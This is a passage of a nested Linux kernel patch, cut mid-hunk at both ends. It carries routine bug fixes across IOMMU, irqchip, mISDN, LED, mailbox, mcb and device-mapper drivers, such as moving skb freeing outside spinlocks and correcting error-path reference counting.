+-	if (zdev && zdev->s390_domain) {
+-		domain = iommu_get_domain_for_dev(dev);
+-		if (domain)
+-			s390_iommu_detach_device(domain, dev);
+-	}
++	if (zdev)
++		__s390_iommu_detach_device(zdev);
+ }
+ 
+ static int s390_iommu_update_trans(struct s390_domain *s390_domain,
+diff --git a/drivers/iommu/sun50i-iommu.c b/drivers/iommu/sun50i-iommu.c
+index cd9b74ee24def..5b585eace3d46 100644
+--- a/drivers/iommu/sun50i-iommu.c
++++ b/drivers/iommu/sun50i-iommu.c
+@@ -27,6 +27,7 @@
+ #include <linux/types.h>
+ 
+ #define IOMMU_RESET_REG			0x010
++#define IOMMU_RESET_RELEASE_ALL			0xffffffff
+ #define IOMMU_ENABLE_REG		0x020
+ #define IOMMU_ENABLE_ENABLE			BIT(0)
+ 
+@@ -92,6 +93,8 @@
+ #define NUM_PT_ENTRIES			256
+ #define PT_SIZE				(NUM_PT_ENTRIES * PT_ENTRY_SIZE)
+ 
++#define SPAGE_SIZE			4096
++
+ struct sun50i_iommu {
+ 	struct iommu_device iommu;
+ 
+@@ -270,7 +273,7 @@ static u32 sun50i_mk_pte(phys_addr_t page, int prot)
+ 	enum sun50i_iommu_aci aci;
+ 	u32 flags = 0;
+ 
+-	if (prot & (IOMMU_READ | IOMMU_WRITE))
++	if ((prot & (IOMMU_READ | IOMMU_WRITE)) == (IOMMU_READ | IOMMU_WRITE))
+ 		aci = SUN50I_IOMMU_ACI_RD_WR;
+ 	else if (prot & IOMMU_READ)
+ 		aci = SUN50I_IOMMU_ACI_RD;
+@@ -294,6 +297,62 @@ static void sun50i_table_flush(struct sun50i_iommu_domain *sun50i_domain,
+ 	dma_sync_single_for_device(iommu->dev, dma, size, DMA_TO_DEVICE);
+ }
+ 
++static void sun50i_iommu_zap_iova(struct sun50i_iommu *iommu,
++				  unsigned long iova)
++{
++	u32 reg;
++	int ret;
++
++	iommu_write(iommu, IOMMU_TLB_IVLD_ADDR_REG, iova);
++	iommu_write(iommu, IOMMU_TLB_IVLD_ADDR_MASK_REG, GENMASK(31, 12));
++	iommu_write(iommu, IOMMU_TLB_IVLD_ENABLE_REG,
++		    IOMMU_TLB_IVLD_ENABLE_ENABLE);
++
++	ret = readl_poll_timeout_atomic(iommu->base + IOMMU_TLB_IVLD_ENABLE_REG,
++					reg, !reg, 1, 2000);
++	if (ret)
++		dev_warn(iommu->dev, "TLB invalidation timed out!\n");
++}
++
++static void sun50i_iommu_zap_ptw_cache(struct sun50i_iommu *iommu,
++				       unsigned long iova)
++{
++	u32 reg;
++	int ret;
++
++	iommu_write(iommu, IOMMU_PC_IVLD_ADDR_REG, iova);
++	iommu_write(iommu, IOMMU_PC_IVLD_ENABLE_REG,
++		    IOMMU_PC_IVLD_ENABLE_ENABLE);
++
++	ret = readl_poll_timeout_atomic(iommu->base + IOMMU_PC_IVLD_ENABLE_REG,
++					reg, !reg, 1, 2000);
++	if (ret)
++		dev_warn(iommu->dev, "PTW cache invalidation timed out!\n");
++}
++
++static void sun50i_iommu_zap_range(struct sun50i_iommu *iommu,
++				   unsigned long iova, size_t size)
++{
++	assert_spin_locked(&iommu->iommu_lock);
++
++	iommu_write(iommu, IOMMU_AUTO_GATING_REG, 0);
++
++	sun50i_iommu_zap_iova(iommu, iova);
++	sun50i_iommu_zap_iova(iommu, iova + SPAGE_SIZE);
++	if (size > SPAGE_SIZE) {
++		sun50i_iommu_zap_iova(iommu, iova + size);
++		sun50i_iommu_zap_iova(iommu, iova + size + SPAGE_SIZE);
++	}
++	sun50i_iommu_zap_ptw_cache(iommu, iova);
++	sun50i_iommu_zap_ptw_cache(iommu, iova + SZ_1M);
++	if (size > SZ_1M) {
++		sun50i_iommu_zap_ptw_cache(iommu, iova + size);
++		sun50i_iommu_zap_ptw_cache(iommu, iova + size + SZ_1M);
++	}
++
++	iommu_write(iommu, IOMMU_AUTO_GATING_REG, IOMMU_AUTO_GATING_ENABLE);
++}
++
+ static int sun50i_iommu_flush_all_tlb(struct sun50i_iommu *iommu)
+ {
+ 	u32 reg;
+@@ -343,6 +402,18 @@ static void sun50i_iommu_flush_iotlb_all(struct iommu_domain *domain)
+ 	spin_unlock_irqrestore(&iommu->iommu_lock, flags);
+ }
+ 
++static void sun50i_iommu_iotlb_sync_map(struct iommu_domain *domain,
++					unsigned long iova, size_t size)
++{
++	struct sun50i_iommu_domain *sun50i_domain = to_sun50i_domain(domain);
++	struct sun50i_iommu *iommu = sun50i_domain->iommu;
++	unsigned long flags;
++
++	spin_lock_irqsave(&iommu->iommu_lock, flags);
++	sun50i_iommu_zap_range(iommu, iova, size);
++	spin_unlock_irqrestore(&iommu->iommu_lock, flags);
++}
++
+ static void sun50i_iommu_iotlb_sync(struct iommu_domain *domain,
+ 				    struct iommu_iotlb_gather *gather)
+ {
+@@ -511,7 +582,7 @@ static u32 *sun50i_dte_get_page_table(struct sun50i_iommu_domain *sun50i_domain,
+ 		sun50i_iommu_free_page_table(iommu, drop_pt);
+ 	}
+ 
+-	sun50i_table_flush(sun50i_domain, page_table, PT_SIZE);
++	sun50i_table_flush(sun50i_domain, page_table, NUM_PT_ENTRIES);
+ 	sun50i_table_flush(sun50i_domain, dte_addr, 1);
+ 
+ 	return page_table;
+@@ -601,7 +672,6 @@ static struct iommu_domain *sun50i_iommu_domain_alloc(unsigned type)
+ 	struct sun50i_iommu_domain *sun50i_domain;
+ 
+ 	if (type != IOMMU_DOMAIN_DMA &&
+-	    type != IOMMU_DOMAIN_IDENTITY &&
+ 	    type != IOMMU_DOMAIN_UNMANAGED)
+ 		return NULL;
+ 
+@@ -766,6 +836,7 @@ static const struct iommu_ops sun50i_iommu_ops = {
+ 		.attach_dev	= sun50i_iommu_attach_device,
+ 		.detach_dev	= sun50i_iommu_detach_device,
+ 		.flush_iotlb_all = sun50i_iommu_flush_iotlb_all,
++		.iotlb_sync_map = sun50i_iommu_iotlb_sync_map,
+ 		.iotlb_sync	= sun50i_iommu_iotlb_sync,
+ 		.iova_to_phys	= sun50i_iommu_iova_to_phys,
+ 		.map		= sun50i_iommu_map,
+@@ -785,6 +856,8 @@ static void sun50i_iommu_report_fault(struct sun50i_iommu *iommu,
+ 		report_iommu_fault(iommu->domain, iommu->dev, iova, prot);
+ 	else
+ 		dev_err(iommu->dev, "Page fault while iommu not attached to any domain?\n");
++
++	sun50i_iommu_zap_range(iommu, iova, SPAGE_SIZE);
+ }
+ 
+ static phys_addr_t sun50i_iommu_handle_pt_irq(struct sun50i_iommu *iommu,
+@@ -868,8 +941,8 @@ static phys_addr_t sun50i_iommu_handle_perm_irq(struct sun50i_iommu *iommu)
+ 
+ static irqreturn_t sun50i_iommu_irq(int irq, void *dev_id)
+ {
++	u32 status, l1_status, l2_status, resets;
+ 	struct sun50i_iommu *iommu = dev_id;
+-	u32 status;
+ 
+ 	spin_lock(&iommu->iommu_lock);
+ 
+@@ -879,6 +952,9 @@ static irqreturn_t sun50i_iommu_irq(int irq, void *dev_id)
+ 		return IRQ_NONE;
+ 	}
+ 
++	l1_status = iommu_read(iommu, IOMMU_L1PG_INT_REG);
++	l2_status = iommu_read(iommu, IOMMU_L2PG_INT_REG);
++
+ 	if (status & IOMMU_INT_INVALID_L2PG)
+ 		sun50i_iommu_handle_pt_irq(iommu,
+ 					    IOMMU_INT_ERR_ADDR_L2_REG,
+@@ -892,8 +968,9 @@ static irqreturn_t sun50i_iommu_irq(int irq, void *dev_id)
+ 
+ 	iommu_write(iommu, IOMMU_INT_CLR_REG, status);
+ 
+-	iommu_write(iommu, IOMMU_RESET_REG, ~status);
+-	iommu_write(iommu, IOMMU_RESET_REG, status);
++	resets = (status | l1_status | l2_status) & IOMMU_INT_MASTER_MASK;
++	iommu_write(iommu, IOMMU_RESET_REG, ~resets);
++	iommu_write(iommu, IOMMU_RESET_REG, IOMMU_RESET_RELEASE_ALL);
+ 
+ 	spin_unlock(&iommu->iommu_lock);
+ 
+diff --git a/drivers/irqchip/irq-gic-pm.c b/drivers/irqchip/irq-gic-pm.c
+index b60e1853593f4..3989d16f997b3 100644
+--- a/drivers/irqchip/irq-gic-pm.c
++++ b/drivers/irqchip/irq-gic-pm.c
+@@ -102,7 +102,7 @@ static int gic_probe(struct platform_device *pdev)
+ 
+ 	pm_runtime_enable(dev);
+ 
+-	ret = pm_runtime_get_sync(dev);
++	ret = pm_runtime_resume_and_get(dev);
+ 	if (ret < 0)
+ 		goto rpm_disable;
+ 
+diff --git a/drivers/irqchip/irq-loongson-liointc.c b/drivers/irqchip/irq-loongson-liointc.c
+index 0da8716f8f24b..c4584e2f0ad3d 100644
+--- a/drivers/irqchip/irq-loongson-liointc.c
++++ b/drivers/irqchip/irq-loongson-liointc.c
+@@ -207,10 +207,13 @@ static int liointc_init(phys_addr_t addr, unsigned long size, int revision,
+ 					"reg-names", core_reg_names[i]);
+ 
+ 			if (index < 0)
+-				goto out_iounmap;
++				continue;
+ 
+ 			priv->core_isr[i] = of_iomap(node, index);
+ 		}
++
++		if (!priv->core_isr[0])
++			goto out_iounmap;
+ 	}
+ 
+ 	/* Setup IRQ domain */
+diff --git a/drivers/irqchip/irq-loongson-pch-pic.c b/drivers/irqchip/irq-loongson-pch-pic.c
+index c01b9c2570053..03493cda65a37 100644
+--- a/drivers/irqchip/irq-loongson-pch-pic.c
++++ b/drivers/irqchip/irq-loongson-pch-pic.c
+@@ -159,6 +159,9 @@ static int pch_pic_domain_translate(struct irq_domain *d,
+ 		return -EINVAL;
+ 
+ 	if (of_node) {
++		if (fwspec->param_count < 2)
++			return -EINVAL;
++
+ 		*hwirq = fwspec->param[0] + priv->ht_vec_base;
+ 		*type = fwspec->param[1] & IRQ_TYPE_SENSE_MASK;
+ 	} else {
+diff --git a/drivers/irqchip/irq-wpcm450-aic.c b/drivers/irqchip/irq-wpcm450-aic.c
+index 0dcbeb1a05a1f..91df62a64cd91 100644
+--- a/drivers/irqchip/irq-wpcm450-aic.c
++++ b/drivers/irqchip/irq-wpcm450-aic.c
+@@ -146,6 +146,7 @@ static int __init wpcm450_aic_of_init(struct device_node *node,
+ 	aic->regs = of_iomap(node, 0);
+ 	if (!aic->regs) {
+ 		pr_err("Failed to map WPCM450 AIC registers\n");
++		kfree(aic);
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/isdn/hardware/mISDN/hfcmulti.c b/drivers/isdn/hardware/mISDN/hfcmulti.c
+index 4f7eaa17fb274..e840609c50eb7 100644
+--- a/drivers/isdn/hardware/mISDN/hfcmulti.c
++++ b/drivers/isdn/hardware/mISDN/hfcmulti.c
+@@ -3217,6 +3217,7 @@ static int
+ hfcm_l1callback(struct dchannel *dch, u_int cmd)
+ {
+ 	struct hfc_multi	*hc = dch->hw;
++	struct sk_buff_head	free_queue;
+ 	u_long	flags;
+ 
+ 	switch (cmd) {
+@@ -3245,6 +3246,7 @@ hfcm_l1callback(struct dchannel *dch, u_int cmd)
+ 		l1_event(dch->l1, HW_POWERUP_IND);
+ 		break;
+ 	case HW_DEACT_REQ:
++		__skb_queue_head_init(&free_queue);
+ 		/* start deactivation */
+ 		spin_lock_irqsave(&hc->lock, flags);
+ 		if (hc->ctype == HFC_TYPE_E1) {
+@@ -3264,20 +3266,21 @@ hfcm_l1callback(struct dchannel *dch, u_int cmd)
+ 				plxsd_checksync(hc, 0);
+ 			}
+ 		}
+-		skb_queue_purge(&dch->squeue);
++		skb_queue_splice_init(&dch->squeue, &free_queue);
+ 		if (dch->tx_skb) {
+-			dev_kfree_skb(dch->tx_skb);
++			__skb_queue_tail(&free_queue, dch->tx_skb);
+ 			dch->tx_skb = NULL;
+ 		}
+ 		dch->tx_idx = 0;
+ 		if (dch->rx_skb) {
+-			dev_kfree_skb(dch->rx_skb);
++			__skb_queue_tail(&free_queue, dch->rx_skb);
+ 			dch->rx_skb = NULL;
+ 		}
+ 		test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+ 		if (test_and_clear_bit(FLG_BUSY_TIMER, &dch->Flags))
+ 			del_timer(&dch->timer);
+ 		spin_unlock_irqrestore(&hc->lock, flags);
++		__skb_queue_purge(&free_queue);
+ 		break;
+ 	case HW_POWERUP_REQ:
+ 		spin_lock_irqsave(&hc->lock, flags);
+@@ -3384,6 +3387,9 @@ handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb)
+ 	case PH_DEACTIVATE_REQ:
+ 		test_and_clear_bit(FLG_L2_ACTIVATED, &dch->Flags);
+ 		if (dch->dev.D.protocol != ISDN_P_TE_S0) {
++			struct sk_buff_head free_queue;
++
++			__skb_queue_head_init(&free_queue);
+ 			spin_lock_irqsave(&hc->lock, flags);
+ 			if (debug & DEBUG_HFCMULTI_MSG)
+ 				printk(KERN_DEBUG
+@@ -3405,14 +3411,14 @@ handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb)
+ 				/* deactivate */
+ 				dch->state = 1;
+ 			}
+-			skb_queue_purge(&dch->squeue);
++			skb_queue_splice_init(&dch->squeue, &free_queue);
+ 			if (dch->tx_skb) {
+-				dev_kfree_skb(dch->tx_skb);
++				__skb_queue_tail(&free_queue, dch->tx_skb);
+ 				dch->tx_skb = NULL;
+ 			}
+ 			dch->tx_idx = 0;
+ 			if (dch->rx_skb) {
+-				dev_kfree_skb(dch->rx_skb);
++				__skb_queue_tail(&free_queue, dch->rx_skb);
+ 				dch->rx_skb = NULL;
+ 			}
+ 			test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+@@ -3424,6 +3430,7 @@ handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb)
+ #endif
+ 			ret = 0;
+ 			spin_unlock_irqrestore(&hc->lock, flags);
++			__skb_queue_purge(&free_queue);
+ 		} else
+ 			ret = l1_event(dch->l1, hh->prim);
+ 		break;
+diff --git a/drivers/isdn/hardware/mISDN/hfcpci.c b/drivers/isdn/hardware/mISDN/hfcpci.c
+index e964a8dd8512a..c0331b2680108 100644
+--- a/drivers/isdn/hardware/mISDN/hfcpci.c
++++ b/drivers/isdn/hardware/mISDN/hfcpci.c
+@@ -1617,16 +1617,19 @@ hfcpci_l2l1D(struct mISDNchannel *ch, struct sk_buff *skb)
+ 		test_and_clear_bit(FLG_L2_ACTIVATED, &dch->Flags);
+ 		spin_lock_irqsave(&hc->lock, flags);
+ 		if (hc->hw.protocol == ISDN_P_NT_S0) {
++			struct sk_buff_head free_queue;
++
++			__skb_queue_head_init(&free_queue);
+ 			/* prepare deactivation */
+ 			Write_hfc(hc, HFCPCI_STATES, 0x40);
+-			skb_queue_purge(&dch->squeue);
++			skb_queue_splice_init(&dch->squeue, &free_queue);
+ 			if (dch->tx_skb) {
+-				dev_kfree_skb(dch->tx_skb);
++				__skb_queue_tail(&free_queue, dch->tx_skb);
+ 				dch->tx_skb = NULL;
+ 			}
+ 			dch->tx_idx = 0;
+ 			if (dch->rx_skb) {
+-				dev_kfree_skb(dch->rx_skb);
++				__skb_queue_tail(&free_queue, dch->rx_skb);
+ 				dch->rx_skb = NULL;
+ 			}
+ 			test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+@@ -1639,10 +1642,12 @@ hfcpci_l2l1D(struct mISDNchannel *ch, struct sk_buff *skb)
+ 			hc->hw.mst_m &= ~HFCPCI_MASTER;
+ 			Write_hfc(hc, HFCPCI_MST_MODE, hc->hw.mst_m);
+ 			ret = 0;
++			spin_unlock_irqrestore(&hc->lock, flags);
++			__skb_queue_purge(&free_queue);
+ 		} else {
+ 			ret = l1_event(dch->l1, hh->prim);
++			spin_unlock_irqrestore(&hc->lock, flags);
+ 		}
+-		spin_unlock_irqrestore(&hc->lock, flags);
+ 		break;
+ 	}
+ 	if (!ret)
+diff --git a/drivers/isdn/hardware/mISDN/hfcsusb.c b/drivers/isdn/hardware/mISDN/hfcsusb.c
+index 651f2f8f685b7..1efd17979f240 100644
+--- a/drivers/isdn/hardware/mISDN/hfcsusb.c
++++ b/drivers/isdn/hardware/mISDN/hfcsusb.c
+@@ -326,20 +326,24 @@ hfcusb_l2l1D(struct mISDNchannel *ch, struct sk_buff *skb)
+ 		test_and_clear_bit(FLG_L2_ACTIVATED, &dch->Flags);
+ 
+ 		if (hw->protocol == ISDN_P_NT_S0) {
++			struct sk_buff_head free_queue;
++
++			__skb_queue_head_init(&free_queue);
+ 			hfcsusb_ph_command(hw, HFC_L1_DEACTIVATE_NT);
+ 			spin_lock_irqsave(&hw->lock, flags);
+-			skb_queue_purge(&dch->squeue);
++			skb_queue_splice_init(&dch->squeue, &free_queue);
+ 			if (dch->tx_skb) {
+-				dev_kfree_skb(dch->tx_skb);
++				__skb_queue_tail(&free_queue, dch->tx_skb);
+ 				dch->tx_skb = NULL;
+ 			}
+ 			dch->tx_idx = 0;
+ 			if (dch->rx_skb) {
+-				dev_kfree_skb(dch->rx_skb);
++				__skb_queue_tail(&free_queue, dch->rx_skb);
+ 				dch->rx_skb = NULL;
+ 			}
+ 			test_and_clear_bit(FLG_TX_BUSY, &dch->Flags);
+ 			spin_unlock_irqrestore(&hw->lock, flags);
++			__skb_queue_purge(&free_queue);
+ #ifdef FIXME
+ 			if (test_and_clear_bit(FLG_L1_BUSY, &dch->Flags))
+ 				dchannel_sched_event(&hc->dch, D_CLEARBUSY);
+@@ -1330,7 +1334,7 @@ tx_iso_complete(struct urb *urb)
+ 					printk("\n");
+ 				}
+ 
+-				dev_kfree_skb(tx_skb);
++				dev_consume_skb_irq(tx_skb);
+ 				tx_skb = NULL;
+ 				if (fifo->dch && get_next_dframe(fifo->dch))
+ 					tx_skb = fifo->dch->tx_skb;
+diff --git a/drivers/leds/leds-is31fl319x.c b/drivers/leds/leds-is31fl319x.c
+index 52b59b62f437c..b2f4c4ec7c567 100644
+--- a/drivers/leds/leds-is31fl319x.c
++++ b/drivers/leds/leds-is31fl319x.c
+@@ -38,6 +38,7 @@
+ #define IS31FL3190_CURRENT_uA_MIN	5000
+ #define IS31FL3190_CURRENT_uA_DEFAULT	42000
+ #define IS31FL3190_CURRENT_uA_MAX	42000
++#define IS31FL3190_CURRENT_SHIFT	2
+ #define IS31FL3190_CURRENT_MASK		GENMASK(4, 2)
+ #define IS31FL3190_CURRENT_5_mA		0x02
+ #define IS31FL3190_CURRENT_10_mA	0x01
+@@ -553,7 +554,7 @@ static int is31fl319x_probe(struct i2c_client *client)
+ 			     is31fl3196_db_to_gain(is31->audio_gain_db));
+ 	else
+ 		regmap_update_bits(is31->regmap, IS31FL3190_CURRENT, IS31FL3190_CURRENT_MASK,
+-				   is31fl3190_microamp_to_cs(dev, aggregated_led_microamp));
++				   is31fl3190_microamp_to_cs(dev, aggregated_led_microamp) << IS31FL3190_CURRENT_SHIFT);
+ 
+ 	for (i = 0; i < is31->cdef->num_leds; i++) {
+ 		struct is31fl319x_led *led = &is31->leds[i];
+diff --git a/drivers/leds/rgb/leds-qcom-lpg.c b/drivers/leds/rgb/leds-qcom-lpg.c
+index 02f51cc618376..c1a56259226fb 100644
+--- a/drivers/leds/rgb/leds-qcom-lpg.c
++++ b/drivers/leds/rgb/leds-qcom-lpg.c
+@@ -602,8 +602,8 @@ static void lpg_brightness_set(struct lpg_led *led, struct led_classdev *cdev,
+ 		lpg_lut_sync(lpg, lut_mask);
+ }
+ 
+-static void lpg_brightness_single_set(struct led_classdev *cdev,
+-				      enum led_brightness value)
++static int lpg_brightness_single_set(struct led_classdev *cdev,
++				     enum led_brightness value)
+ {
+ 	struct lpg_led *led = container_of(cdev, struct lpg_led, cdev);
+ 	struct mc_subled info;
+@@ -614,10 +614,12 @@ static void lpg_brightness_single_set(struct led_classdev *cdev,
+ 	lpg_brightness_set(led, cdev, &info);
+ 
+ 	mutex_unlock(&led->lpg->lock);
++
++	return 0;
+ }
+ 
+-static void lpg_brightness_mc_set(struct led_classdev *cdev,
+-				  enum led_brightness value)
++static int lpg_brightness_mc_set(struct led_classdev *cdev,
++				 enum led_brightness value)
+ {
+ 	struct led_classdev_mc *mc = lcdev_to_mccdev(cdev);
+ 	struct lpg_led *led = container_of(mc, struct lpg_led, mcdev);
+@@ -628,6 +630,8 @@ static void lpg_brightness_mc_set(struct led_classdev *cdev,
+ 	lpg_brightness_set(led, cdev, mc->subled_info);
+ 
+ 	mutex_unlock(&led->lpg->lock);
++
++	return 0;
+ }
+ 
+ static int lpg_blink_set(struct lpg_led *led,
+@@ -1118,7 +1122,7 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 		led->mcdev.num_colors = num_channels;
+ 
+ 		cdev = &led->mcdev.led_cdev;
+-		cdev->brightness_set = lpg_brightness_mc_set;
++		cdev->brightness_set_blocking = lpg_brightness_mc_set;
+ 		cdev->blink_set = lpg_blink_mc_set;
+ 
+ 		/* Register pattern accessors only if we have a LUT block */
+@@ -1132,7 +1136,7 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 			return ret;
+ 
+ 		cdev = &led->cdev;
+-		cdev->brightness_set = lpg_brightness_single_set;
++		cdev->brightness_set_blocking = lpg_brightness_single_set;
+ 		cdev->blink_set = lpg_blink_single_set;
+ 
+ 		/* Register pattern accessors only if we have a LUT block */
+@@ -1151,7 +1155,7 @@ static int lpg_add_led(struct lpg *lpg, struct device_node *np)
+ 	else
+ 		cdev->brightness = LED_OFF;
+ 
+-	cdev->brightness_set(cdev, cdev->brightness);
++	cdev->brightness_set_blocking(cdev, cdev->brightness);
+ 
+ 	init_data.fwnode = of_fwnode_handle(np);
+ 
+diff --git a/drivers/macintosh/macio-adb.c b/drivers/macintosh/macio-adb.c
+index 9b63bd2551c63..cd4e34d15c26b 100644
+--- a/drivers/macintosh/macio-adb.c
++++ b/drivers/macintosh/macio-adb.c
+@@ -108,6 +108,10 @@ int macio_init(void)
+ 		return -ENXIO;
+ 	}
+ 	adb = ioremap(r.start, sizeof(struct adb_regs));
++	if (!adb) {
++		of_node_put(adbs);
++		return -ENOMEM;
++	}
+ 
+ 	out_8(&adb->ctrl.r, 0);
+ 	out_8(&adb->intr.r, 0);
+diff --git a/drivers/macintosh/macio_asic.c b/drivers/macintosh/macio_asic.c
+index 1ec1e5984563f..3bc1f374e6577 100644
+--- a/drivers/macintosh/macio_asic.c
++++ b/drivers/macintosh/macio_asic.c
+@@ -424,7 +424,7 @@ static struct macio_dev * macio_add_one_device(struct macio_chip *chip,
+ 	if (of_device_register(&dev->ofdev) != 0) {
+ 		printk(KERN_DEBUG"macio: device registration error for %s!\n",
+ 		       dev_name(&dev->ofdev.dev));
+-		kfree(dev);
++		put_device(&dev->ofdev.dev);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/mailbox/arm_mhuv2.c b/drivers/mailbox/arm_mhuv2.c
+index a47aef8df52fd..c6d4957c4da83 100644
+--- a/drivers/mailbox/arm_mhuv2.c
++++ b/drivers/mailbox/arm_mhuv2.c
+@@ -1062,8 +1062,8 @@ static int mhuv2_probe(struct amba_device *adev, const struct amba_id *id)
+ 	int ret = -EINVAL;
+ 
+ 	reg = devm_of_iomap(dev, dev->of_node, 0, NULL);
+-	if (!reg)
+-		return -ENOMEM;
++	if (IS_ERR(reg))
++		return PTR_ERR(reg);
+ 
+ 	mhu = devm_kzalloc(dev, sizeof(*mhu), GFP_KERNEL);
+ 	if (!mhu)
+diff --git a/drivers/mailbox/mailbox-mpfs.c b/drivers/mailbox/mailbox-mpfs.c
+index cfacb3f320a64..853901acaeec2 100644
+--- a/drivers/mailbox/mailbox-mpfs.c
++++ b/drivers/mailbox/mailbox-mpfs.c
+@@ -2,7 +2,7 @@
+ /*
+  * Microchip PolarFire SoC (MPFS) system controller/mailbox controller driver
+  *
+- * Copyright (c) 2020 Microchip Corporation. All rights reserved.
++ * Copyright (c) 2020-2022 Microchip Corporation. All rights reserved.
+  *
+  * Author: Conor Dooley <conor.dooley@microchip.com>
+  *
+@@ -56,7 +56,7 @@
+ #define SCB_STATUS_NOTIFY_MASK BIT(SCB_STATUS_NOTIFY)
+ 
+ #define SCB_STATUS_POS (16)
+-#define SCB_STATUS_MASK GENMASK_ULL(SCB_STATUS_POS + SCB_MASK_WIDTH, SCB_STATUS_POS)
++#define SCB_STATUS_MASK GENMASK(SCB_STATUS_POS + SCB_MASK_WIDTH - 1, SCB_STATUS_POS)
+ 
+ struct mpfs_mbox {
+ 	struct mbox_controller controller;
+@@ -130,13 +130,38 @@ static void mpfs_mbox_rx_data(struct mbox_chan *chan)
+ 	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
+ 	struct mpfs_mss_response *response = mbox->response;
+ 	u16 num_words = ALIGN((response->resp_size), (4)) / 4U;
+-	u32 i;
++	u32 i, status;
+ 
+ 	if (!response->resp_msg) {
+ 		dev_err(mbox->dev, "failed to assign memory for response %d\n", -ENOMEM);
+ 		return;
+ 	}
+ 
++	/*
++	 * The status is stored in bits 31:16 of the SERVICES_SR register.
++	 * It is only valid when BUSY == 0.
++	 * We should *never* get an interrupt while the controller is
++	 * still in the busy state. If we do, something has gone badly
++	 * wrong & the content of the mailbox would not be valid.
++	 */
++	if (mpfs_mbox_busy(mbox)) {
++		dev_err(mbox->dev, "got an interrupt but system controller is busy\n");
++		response->resp_status = 0xDEAD;
++		return;
++	}
++
++	status = readl_relaxed(mbox->ctrl_base + SERVICES_SR_OFFSET);
++
++	/*
++	 * If the status of the individual servers is non-zero, the service has
++	 * failed. The contents of the mailbox at this point are not be valid,
++	 * so don't bother reading them. Set the status so that the driver
++	 * implementing the service can handle the result.
++	 */
++	response->resp_status = (status & SCB_STATUS_MASK) >> SCB_STATUS_POS;
++	if (response->resp_status)
++		return;
++
+ 	if (!mpfs_mbox_busy(mbox)) {
+ 		for (i = 0; i < num_words; i++) {
+ 			response->resp_msg[i] =
+diff --git a/drivers/mailbox/pcc.c b/drivers/mailbox/pcc.c
+index 3c2bc0ca454cf..105d46c9801ba 100644
+--- a/drivers/mailbox/pcc.c
++++ b/drivers/mailbox/pcc.c
+@@ -743,6 +743,7 @@ static int __init pcc_init(void)
+ 
+ 	if (IS_ERR(pcc_pdev)) {
+ 		pr_debug("Err creating PCC platform bundle\n");
++		pcc_chan_count = 0;
+ 		return PTR_ERR(pcc_pdev);
+ 	}
+ 
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index 31a0fa9142744..12e004ff1a147 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -493,6 +493,7 @@ static int zynqmp_ipi_mbox_probe(struct zynqmp_ipi_mbox *ipi_mbox,
+ 	ret = device_register(&ipi_mbox->dev);
+ 	if (ret) {
+ 		dev_err(dev, "Failed to register ipi mbox dev.\n");
++		put_device(&ipi_mbox->dev);
+ 		return ret;
+ 	}
+ 	mdev = &ipi_mbox->dev;
+@@ -619,7 +620,8 @@ static void zynqmp_ipi_free_mboxes(struct zynqmp_ipi_pdata *pdata)
+ 		ipi_mbox = &pdata->ipi_mboxes[i];
+ 		if (ipi_mbox->dev.parent) {
+ 			mbox_controller_unregister(&ipi_mbox->mbox);
+-			device_unregister(&ipi_mbox->dev);
++			if (device_is_registered(&ipi_mbox->dev))
++				device_unregister(&ipi_mbox->dev);
+ 		}
+ 	}
+ }
+diff --git a/drivers/mcb/mcb-core.c b/drivers/mcb/mcb-core.c
+index 338fc889b357a..b8ad4f16b4acd 100644
+--- a/drivers/mcb/mcb-core.c
++++ b/drivers/mcb/mcb-core.c
+@@ -71,8 +71,10 @@ static int mcb_probe(struct device *dev)
+ 
+ 	get_device(dev);
+ 	ret = mdrv->probe(mdev, found_id);
+-	if (ret)
++	if (ret) {
+ 		module_put(carrier_mod);
++		put_device(dev);
++	}
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index 0266bfddfbe27..aa6938da0db85 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -108,7 +108,7 @@ static int chameleon_parse_gdd(struct mcb_bus *bus,
+ 	return 0;
+ 
+ err:
+-	mcb_free_dev(mdev);
++	put_device(&mdev->dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index 95a1ee3d314eb..e30c2d2bc9c78 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -732,28 +732,48 @@ static char *_dm_claim_ptr = "I belong to device-mapper";
+ /*
+  * Open a table device so we can use it as a map destination.
+  */
+-static int open_table_device(struct table_device *td, dev_t dev,
+-			     struct mapped_device *md)
++static struct table_device *open_table_device(struct mapped_device *md,
++		dev_t dev, fmode_t mode)
+ {
++	struct table_device *td;
+ 	struct block_device *bdev;
+ 	u64 part_off;
+ 	int r;
+ 
+-	BUG_ON(td->dm_dev.bdev);
++	td = kmalloc_node(sizeof(*td), GFP_KERNEL, md->numa_node_id);
++	if (!td)
++		return ERR_PTR(-ENOMEM);
++	refcount_set(&td->count, 1);
+ 
+-	bdev = blkdev_get_by_dev(dev, td->dm_dev.mode | FMODE_EXCL, _dm_claim_ptr);
+-	if (IS_ERR(bdev))
+-		return PTR_ERR(bdev);
++	bdev = blkdev_get_by_dev(dev, mode | FMODE_EXCL, _dm_claim_ptr);
++	if (IS_ERR(bdev)) {
++		r = PTR_ERR(bdev);
++		goto out_free_td;
++	}
+ 
+-	r = bd_link_disk_holder(bdev, dm_disk(md));
+-	if (r) {
+-		blkdev_put(bdev, td->dm_dev.mode | FMODE_EXCL);
+-		return r;
++	/*
++	 * We can be called before the dm disk is added.  In that case we can't
++	 * register the holder relation here.  It will be done once add_disk was
++	 * called.
++	 */
++	if (md->disk->slave_dir) {
